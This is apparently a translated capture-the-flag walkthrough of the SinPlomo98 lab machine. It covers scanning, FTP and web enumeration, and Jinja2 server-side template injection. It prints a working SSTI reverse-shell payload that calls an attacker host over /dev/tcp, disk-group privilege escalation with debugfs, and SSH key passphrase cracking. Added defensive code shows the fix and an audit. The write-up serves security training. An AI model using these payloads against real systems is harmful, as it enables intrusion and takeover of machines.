TheHackersLabs SinPlomo98 Target Machine Walkthrough (WP)
城南花已开 Lv5

Information Gathering

Service Detection

Four ports are open, one of them FTP.

sudo arp-scan -l
sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.134 08:00:27:4b:15:37 (Unknown)
192.168.60.254 00:50:56:fd:82:05 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.973 seconds (129.75 hosts/sec). 4 responded
export ip=192.168.60.134
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.134:22
Open 192.168.60.134:21
Open 192.168.60.134:80
Open 192.168.60.134:5000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 22:25 CST
Initiating ARP Ping Scan at 22:25
Scanning 192.168.60.134 [1 port]
Completed ARP Ping Scan at 22:25, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:25
Completed Parallel DNS resolution of 1 host. at 22:25, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:25
Scanning 192.168.60.134 [4 ports]
Discovered open port 80/tcp on 192.168.60.134
Discovered open port 5000/tcp on 192.168.60.134
Discovered open port 22/tcp on 192.168.60.134
Discovered open port 21/tcp on 192.168.60.134
Completed SYN Stealth Scan at 22:25, 0.03s elapsed (4 total ports)
Nmap scan report for 192.168.60.134
Host is up, received arp-response (0.00036s latency).
Scanned at 2025-01-03 22:25:38 CST for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
5000/tcp open upnp syn-ack ttl 64
MAC Address: 08:00:27:4B:15:37 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

Let's look at port 80 first.

I ran a directory scan.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.134
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 317] [--> http://192.168.60.134/assets/]
/forms (Status: 301) [Size: 316] [--> http://192.168.60.134/forms/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.134/javascript/]
/server-status (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================

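Next, look for a way in through the web pages.

The home page has a "Contact Us" feature, but it cannot send anything; it looks like a library was not imported.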

FTP Enumeration

Logging in to FTP as the anonymous user turns up a hint.

❯ ftp  anonymous@$ip
Connected to 192.168.60.134.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||28025|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 34 May 16 2024 supermegaultraimportantebro.txt
226 Directory send OK.
ftp> get supermegaultraimportantebro.txt
local: supermegaultraimportantebro.txt remote: supermegaultraimportantebro.txt
229 Entering Extended Passive Mode (|||14829|)
150 Opening BINARY mode data connection for supermegaultraimportantebro.txt (34 bytes).
100% |*********************************************************************************************************| 34 15.67 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (9.91 KiB/s)
cat supermegaultraimportantebro.txt
Gracias por venir, ahora vayase!!
(Translation: Thanks for coming, now please leave!!)

Visiting port 5000 shows only a picture of oil extraction; download it with wget.

The image is a full 12MB, that large.

❯ curl 192.168.60.134:5000
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>¡Mi Página Web!</title>
<style>
html, body {
margin: 0;
padding: 0;
height: 100%;
overflow: hidden;
}
img {
width: 100%;
height: 100%;
object-fit: cover; /* Para asegurarse de que la imagen cubra todo el espacio */
}
</style>
</head>
<body>
<img src="/static/imagen.jpg" alt="Descripción de la imagen">
</body>
</html>

<!-- /petrolhead -->%

Looking at the EXIF data, the resolution is around 4K; no wonder it is so large.

❯ wget http://192.168.60.134:5000/static/imagen.jpg
--2025-01-03 22:35:28-- http://192.168.60.134:5000/static/imagen.jpg
Connecting to 192.168.60.134:5000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 323729 (316K) [image/jpeg]
Saving to: ‘imagen.jpg’

imagen.jpg 100%[=======================================================================>] 316.14K --.-KB/s in 0.03s

2025-01-03 22:35:28 (12.1 MB/s) - ‘imagen.jpg’ saved [323729/323729]
❯ exiftool imagen.jpg
ExifTool Version Number : 13.00
File Name : imagen.jpg
Directory : .
File Size : 324 kB
File Modification Date/Time : 2024:05:16 15:10:41+08:00
File Access Date/Time : 2025:01:03 22:35:28+08:00
File Inode Change Date/Time : 2025:01:03 22:35:28+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.02
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Image Width : 3626
Image Height : 2479
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 3626x2479
Megapixels : 9.0

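SSTI Injection

When running curl above, I overlooked the comment on the last line, /petrolhead, which hints at a directory.

I tried command injection, but it failed.

Stuck here, I read other people's write-ups and learned that this is SSTI (server-side template injection); see the links below for details.

SSTI (Server Side Template Injection) - HackTricks

Hackmanit/TInjA: TInjA is a CLI tool for testing web pages for template injection vulnerabilities, supporting 44 of the most relevant template engines for 8 different programming languages.

Using TInjA, we identify the engine as Python's Jinja2/Jinja2.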

❯ ./tinja url -u  http://192.168.60.134:5000/petrolhead -d "user_input="
TInjA v1.1.4 started at 2025-01-03_23-11-13

Analyzing URL(1/1): http://192.168.60.134:5000/petrolhead
===============================================================
Status code 200
Analyzing post parameter user_input => {{1*2}}
[*] Value SOHBMVCMULIJPZGB of POST parameter user_input is being reflected 1 time(s) in the response body

[!] The polyglot <%'${{/#{@}}%>{{ triggered an error: Status Code 500
[!] The polyglot p ">[[${{1}}]] was rendered in a modified way: [p ">[[$1]]]
[*] The polyglot p ">[[${{1}}]] returned the response(s) [p ">[[$1]]]
[*] The polyglot <%=1%>@*#{1} returned the response(s) [unmodified]
[!] The polyglot {##}/*{{.}}*/ triggered an error: Status Code 500

A template injection was detected and the template engine is now being identified.
[!] The polyglot <%{{#{%>} triggered an error: Status Code 500
[!] The polyglot <%=1%>#{2}{{a}} was rendered in a modified way: [<%=1%>#{2}]
[*] The polyglot <%=1%>#{2}{{a}} returned the response(s) [<%=1%>#{2}]
[!] The polyglot //*<!--{##<%=1%>{{!--{{1}}--}}-->*/#} was rendered in a modified way: [//*<!--]
[*] The polyglot //*<!--{##<%=1%>{{!--{{1}}--}}-->*/#} returned the response(s) [//*<!--]
[!] The polyglot {{/}} triggered an error: Status Code 500
[!] The polyglot {{1in[1]}} was rendered in a modified way: [True]
[*] The polyglot {{1in[1]}} returned the response(s) [True]

Verifying the template injection by issuing template expressions tailored to the specific template engine.
[*] Verifying Jinja2/Jinja2 (Sandbox).
[*] The polyglot {{ 7*7 }} returned the response(s) [49]
[+] Jinja2/Jinja2 (Sandbox) was identified (certainty: Very High)

===============================================================

Successfully finished the scan
[+] Suspected template injections: 1
[+] 1 Very High, 0 High, 0 Medium, 0 Low, 0 Very Low certainty

Duration: 89.504144ms
Average polyglots sent per user input: 9
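
The root cause behind a finding like the one above, next to its fix, as an added example that is not code from the target or from the original post. The target's source is not shown on the page, so the template text and the function names `render_vulnerable`, `render_fixed` and `evaluates_input` are assumptions; it needs the `jinja2` package.

```python
from jinja2 import Environment

env = Environment(autoescape=True)


def render_vulnerable(user_input: str) -> str:
    # Intentionally vulnerable: the request value becomes part of the template
    # *source*, so Jinja2 evaluates any {{ ... }} expression it contains.
    return env.from_string("<p>Resultado: " + user_input + "</p>").render()


def render_fixed(user_input: str) -> str:
    # The template source is a constant. The request value is passed only as
    # data in the render context, so it is HTML-escaped and never evaluated.
    template = env.from_string("<p>Resultado: {{ user_input }}</p>")
    return template.render(user_input=user_input)


def evaluates_input(render) -> bool:
    """Regression check for a test suite: send a harmless arithmetic canary
    (the same idea as the {{ 7*7 }} probe) and see whether it was computed."""
    a, b = 1337, 7331
    return str(a * b) in render("{{ %d*%d }}" % (a, b))


if __name__ == "__main__":
    for probe in ["{{ 7*7 }}", "<b>hola</b>"]:  # constructed inputs
        print(repr(probe))
        print("  vulnerable:", render_vulnerable(probe))
        print("  fixed:     ", render_fixed(probe))
    print("vulnerable evaluates input:", evaluates_input(render_vulnerable))
    print("fixed evaluates input:     ", evaluates_input(render_fixed))
```

In a Flask application the same distinction is `render_template_string(source_built_from_input)` versus `render_template_string(constant_source, user_input=value)`.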

A payload for it can be found on GitHub.

[PayloadsAllTheThings/Server Side Template Injection/Python.md at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/Python.md#exploit-the-ssti-by-calling-ospopenread)

Check whether a read works normally.

User Privilege Escalation

It works. Use the payload below to get a reverse shell.

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('bash -c \'bash -i >& /dev/tcp/192.168.60.100/1234 0>&1\'').read() }}

Listen on port 1234 on Kali.

❯ pwncat-cs -lp 1234
[23:42:20] Welcome to pwncat 🐈! __main__.py:164
[23:42:21] received connection from 192.168.60.134:46220 bind.py:84
[23:42:22] 192.168.60.134:46220: registered new host w/ db manager.py:957
(local) pwncat$
(remote) tcuser@SinPLomo98:/home/tcuser/prueba$ id
uid=1000(tcuser) gid=1000(tcuser) grupos=1000(tcuser),6(disk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

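Exploiting the disk Group

We can see that this user belongs to the disk group; the privilege escalation technique is described in the article below.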

[Interesting Groups - Linux Privesc - HackTricks](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html?highlight=disk gourp#disk-group)

Files can be read directly, which gets us the flags right away.

(remote) tcuser@SinPLomo98:/home/tcuser$ df -h
S.ficheros Tamaño Usados Disp Uso% Montado en
udev 962M 0 962M 0% /dev
tmpfs 197M 524K 197M 1% /run
/dev/sda1 19G 2,4G 16G 14% /
tmpfs 984M 0 984M 0% /dev/shm
tmpfs 5,0M 0 5,0M 0% /run/lock
(remote) tcuser@SinPLomo98:/home/tcuser$ debugfs -w /dev/sda1
debugfs 1.47.0 (5-Feb-2023)
debugfs: cat /home/tcuser/user.txt
aa3b5421f267d0bec5b0e72cb638187b
debugfs: cat /root/root.txt
6d75e57572638098039f7fbb6fd39b70
debugfs:quit
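
Because disk-group membership bypasses file permissions as shown above, an audit for it is worth having. The following is an added example, not part of the original write-up: the function name `risky_members` is hypothetical, and the sample files are constructed from the `id` output earlier on the page.

```python
RISKY_GROUPS = {"disk"}  # members can open raw block devices such as /dev/sda1

# Constructed sample files, modelled on the `id` output shown earlier.
# The "backup" account with primary GID 6 is invented to show the primary-group case.
SAMPLE_GROUP = """\
root:x:0:
disk:x:6:tcuser
cdrom:x:24:tcuser
tcuser:x:1000:
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
backup:x:34:6:backup:/var/backups:/usr/sbin/nologin
tcuser:x:1000:1000::/home/tcuser:/bin/bash
"""


def risky_members(group_text, passwd_text, risky=RISKY_GROUPS):
    """Map each risky group to the non-root accounts that belong to it, counting
    both supplementary membership (/etc/group) and primary GID (/etc/passwd)."""
    gid_to_name, members = {}, {}
    for line in group_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 4 or fields[0] not in risky:
            continue
        name, _pw, gid, users = fields
        gid_to_name[gid] = name
        members[name] = {u for u in users.split(",") if u}
    for line in passwd_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 7 and fields[3] in gid_to_name:
            members[gid_to_name[fields[3]]].add(fields[0])
    return {g: sorted(u - {"root"}) for g, u in members.items()}


if __name__ == "__main__":
    # On a real host, pass the contents of /etc/group and /etc/passwd instead.
    for group, users in risky_members(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        print(f"{group}: {', '.join(users) or '(none)'}")
```

Any account this reports, such as the service account running the web application here, should be removed from the group unless it genuinely needs raw device access.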

Once you have the private key file, you can also go a step further and log in to get root.

debugfs:  cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
angels1 (id_rsa)
1g 0:00:08:51 DONE 2/3 (2025-01-04 00:15) 0.001882g/s 43.56p/s 43.56c/s 43.56C/s active1..ashton1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ ssh root@192.168.60.134 -i id_rsa
The authenticity of host '192.168.60.134 (192.168.60.134)' can't be established.
ED25519 key fingerprint is SHA256:F3OjFFzQXiCaifa+reryaJCdnjPukFzPeXTCI70bZqI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.134' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux SinPLomo98 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 16 16:49:15 2024 from 192.168.0.108
root@SinPLomo98:~# cat root.txt
6d75e57572638098039f7fbb6fd39b70
root@SinPLomo98:~# id
uid=0(root) gid=0(root) grupos=0(root)

That route also means cracking the private key, which is too much trouble; just grabbing the flags directly gets it done 🥱
